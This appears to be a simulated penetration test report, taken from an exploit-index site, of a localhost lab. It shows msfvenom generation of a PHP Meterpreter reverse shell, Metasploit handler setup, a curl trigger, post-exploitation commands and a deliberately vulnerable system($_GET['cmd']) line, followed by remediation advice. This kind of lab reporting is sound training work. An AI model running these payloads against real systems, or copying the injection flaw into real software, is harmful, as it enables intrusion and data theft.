Share
## https://sploitus.com/exploit?id=612FC486-5A30-55ED-BE1F-C1DFDDA1A93F
# Internal-Penetration-Test-Report-Web-Exploitation-Post-Exploitation-Using-Metasploit-
Simulated internal penetration test using Metasploit on a Kali Linux VM, demonstrating PHP command injection, reverse shell, and Meterpreter post-exploitation. Includes full attack chain analysis and highlights critical RCE risk. Logs and security events were correlated and validated using Wazuh for detection and monitoring.
Internal Penetration Test Report

Assessment Type: Simulated Internal Penetration Test
Environment: Kali Linux VM (Localhost Simulation)
Date: 30 May 2026

## 1. Executive Summary

This assessment simulated an internal penetration test from an attacker’s perspective within a controlled Kali Linux environment. The objective was to identify vulnerabilities, exploit misconfigurations, and demonstrate post-exploitation capabilities.

The test successfully achieved remote code execution (RCE) via a vulnerable PHP web application, resulting in a Meterpreter session as a low-privileged user (webuser). Sensitive data was accessed, confirming full compromise of the application layer.

Overall Risk Rating: Critical

## 2. Scope and Methodology

Scope

* Target: 127.0.0.1 (localhost)
* Users:
    * victim
    * webuser
* Services:
    * Web server (port 8080)
    * Echo service (port 9003)
    * SSH (port 22)

Methodology

The engagement followed standard penetration testing phases:

1. Environment setup
2. Service simulation
3. Reconnaissance
4. Exploitation
5. Post-exploitation
6. Reporting


## 3. Environment Setup & Service Simulation

Two users were created to simulate a realistic internal environment:

sudo adduser victim --disabled-password --gecos ""
sudo adduser webuser --disabled-password --gecos ""

A vulnerable web application was deployed:

echo '' | sudo tee /home/webuser/web/uploads/upload.php
echo "FLAG{simulated_web_flag}" | sudo tee /home/webuser/web/uploads/flag.txt
sudo chown -R webuser:webuser /home/webuser/web

This introduced a command injection vulnerability, allowing arbitrary OS command execution via URL parameters.

The PHP web server was started:

sudo -u webuser php -S 127.0.0.1:8080 -t /home/webuser/web/uploads


Internal Service Simulation

A custom echo service was created and executed:

sudo -u victim nohup python3 /home/victim/fake_service.py > /tmp/fake_service.log 2>&1 &

Interaction confirmed service functionality:

nc 127.0.0.1 9003
Welcome to Echo Service
hi
ECHO: hi

This represents an unauthenticated internal service, increasing attack surface.


## 4. Reconnaissance

A targeted scan was performed:

nmap -p 22,8080,9003 127.0.0.1

## Results

Port	State	Service
22	Open	SSH
8080	Closed	HTTP (initial scan)
9003	Open	Unknown (custom service)

The echo service on port 9003 was identified as a non-standard service with no authentication.

## 5. Exploitation

Payload Generation

A PHP Meterpreter reverse shell was created:

msfvenom -p php/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4443 -f raw -o shell.php

## Payload deployment:

sudo cp shell.php /home/webuser/web/uploads/shell.php
sudo chown webuser:webuser /home/webuser/web/uploads/shell.php


 ## Listener Setup

Metasploit handler configured:

use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4443
run

## Exploit Execution

Triggering the payload:

curl http://127.0.0.1:8080/shell.php


Successful Compromise

[*] Meterpreter session 1 opened (127.0.0.1:4443 -> 127.0.0.1:57512)

This confirms successful remote code execution.


## 6. Post-Exploitation

### System Enumeration

sysinfo

Output:

* OS: Linux Kali
* Architecture: x64


User Context

getuid

Result:

Server username: webuser


## File System Access

ls
cat flag.txt

Output:

FLAG{simulated_web_flag}

This confirms successful access to sensitive data.

Shell Access

shell
whoami
id
uname -a

Output:

webuser
uid=1002(webuser) gid=1002(webuser)
Linux kali ...

This demonstrates full command execution capability under the compromised user.


## 7. Vulnerabilities Identified

7.1 Command Injection (Critical)

Location: upload.php

Description:
The application executes user input directly:

system($_GET["cmd"]);

Impact:

* Remote command execution
* Full system compromise


## 7.2 Insecure File Upload (High)

* No validation of uploaded files
* Execution of arbitrary PHP scripts allowed


## 7.3 Unauthenticated Internal Service (Medium)

* Echo service exposed on port 9003
* No authentication or input validation


## 8. Remediation Recommendations

Immediate Fixes

* Remove unsafe PHP functions (system)
* Implement input validation and sanitisation
* Disable execution in upload directories

 ## Additional Controls

* Apply least privilege principles
* Restrict internal service access
* Implement firewall segmentation
* Enable logging and monitoring


## 9. Conclusion

The assessment demonstrated how a simple web application vulnerability can lead to full system compromise. The combination of insecure coding practices and exposed services allowed rapid exploitation and data access.

In a real-world environment, this level of access could be leveraged for lateral movement, privilege escalation, and persistence.

## 10. Key Takeaways

* Internal environments are not inherently secure
* Input validation is critical
* Misconfigured services increase risk
* Post-exploitation capabilities enable deeper compromise


End of Report